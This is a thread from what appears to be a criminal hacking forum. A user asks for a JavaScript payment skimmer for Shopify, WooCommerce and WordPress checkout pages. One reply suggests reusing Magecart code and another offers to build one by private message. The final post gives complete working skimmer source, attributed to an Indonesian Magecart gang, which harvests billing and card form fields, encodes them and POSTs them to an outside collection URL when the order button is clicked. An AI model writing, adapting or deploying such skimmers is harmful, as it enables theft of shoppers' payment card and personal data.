• XSS.stack #1 – первый литературный журнал от юзеров форума

need someone to make .js skimmer

Отслеживать
crypt0

crypt0

(L3) cache
Забанен
Регистрация
22.04.2023
Сообщения
161
Реакции
37
Пожалуйста, обратите внимание, что пользователь заблокирован
As post says i need someone to make me a .js skimmer that exils data via POST to a sperate URL and then into .CSV
Will be placed on my own shop(s) must overlay the original payment page
shops are SHOPIFY, WOOcommerce, and wordpress with payment plugins
If anyone can do lets talk
 
crypt0 сказал(а):
As post says i need someone to make me a .js skimmer that exils data via POST to a sperate URL and then into .CSV
Will be placed on my own shop(s) must overlay the original payment page
shops are SHOPIFY, WOOcommerce, and wordpress with payment plugins
If anyone can do lets talk
take a look at a recent magecart skimmer for example. you can typically use magecart skimmers pretty much out of the box without requiring many modifications to fit your needs. there are plenty of papers about it that have archived the entire javascript for analysis and can handle scraping data off all 3 of the major e-commerce platforms.
 
Пожалуйста, обратите внимание, что пользователь заблокирован
vei сказал(а):
take a look at a recent magecart skimmer for example. you can typically use magecart skimmers pretty much out of the box without requiring many modifications to fit your needs. there are plenty of papers about it that have archived the entire javascript for analysis and can handle scraping data off all 3 of the major e-commerce platforms.
thnaks for the reply can you point me to the full source a github repo for example if possible ??
 
Пожалуйста, обратите внимание, что пользователь заблокирован
crypt0 сказал(а):
As post says i need someone to make me a .js skimmer that exils data via POST to a sperate URL and then into .CSV
Will be placed on my own shop(s) must overlay the original payment page
shops are SHOPIFY, WOOcommerce, and wordpress with payment plugins
If anyone can do lets talk
if I understand correctly you want a JS skimmer in the form of plugins compatible with WordPress and woocommerce right? if so, DM
 
This skimmer was used by an Indonesian magecart gang. Source: https://thehackernews.com/2020/01/indonesian-magecart-hackers.html

JavaScript: 
var _____WB$wombat$assign$function_____ = function(name) {return (self._wb_wombat && self._wb_wombat.local_init && self._wb_wombat.local_init(name)) || self[name]; };
if (!self.__WB_pmw) { self.__WB_pmw = function(obj) { this.__WB_source = obj; return this; } }
{
  let window = _____WB$wombat$assign$function_____("window");
  let self = _____WB$wombat$assign$function_____("self");
  let document = _____WB$wombat$assign$function_____("document");
  let location = _____WB$wombat$assign$function_____("location");
  let top = _____WB$wombat$assign$function_____("top");
  let parent = _____WB$wombat$assign$function_____("parent");
  let frames = _____WB$wombat$assign$function_____("frames");
  let opener = _____WB$wombat$assign$function_____("opener");

function b64EncodeUnicode(str) {
        return btoa(encodeURIComponent(str).replace(/%([0-9A-F]{2})/g,
                function toSolidBytes(match, p1) {
                    return String.fromCharCode('0x' + p1);
                }
            )
        );
    }

    function sendPost(url,data){
        var xhttp = new XMLHttpRequest();
        xhttp.onreadystatechange = function() {
            if (this.readyState == 4 && this.status == 200) {
                console.log("Success gan !");
            }
        };
        xhttp.open("POST", url, true);
        xhttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
        xhttp.send("log=" + data);
    }

    function getBilling(){
        var data = [];
        var form = document.getElementById("co-billing-form");
        for(i=0;i<form.elements.length;i++){
            if(form.elements[i].name || form.elements[i].value){
                data.push(form.elements[i].name + " :" + form.elements[i].value);
            }
        }
        return data;  
    }

    function getPayment(){
        var data = [];
        var form = document.getElementById("co-payment-form");
        for(i=0;i<form.elements.length;i++){
            if(form.elements[i].name || form.elements[i].value){
                data.push(form.elements[i].name + " :" + form.elements[i].value);
            }
        }
        return data;
    }

    function buildData(){
        var data = b64EncodeUnicode(getBilling().join(" | ") + getPayment().join(" | "));  
        return data;
    }

    document.onclick= function(event) {
        if (event===undefined) event= window.event;
        var target= 'target' in event? event.target : event.srcElement;
        if(target.className == "order-review-button" || target.tagName == "SPAN"){
            var payment = document.getElementById("paypal_direct_cc_cid");
            if(payment && payment.value !== ""){
                sendPost("https://magecart.net/data.php",buildData());
            }
        }
    };

}
 
admin


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх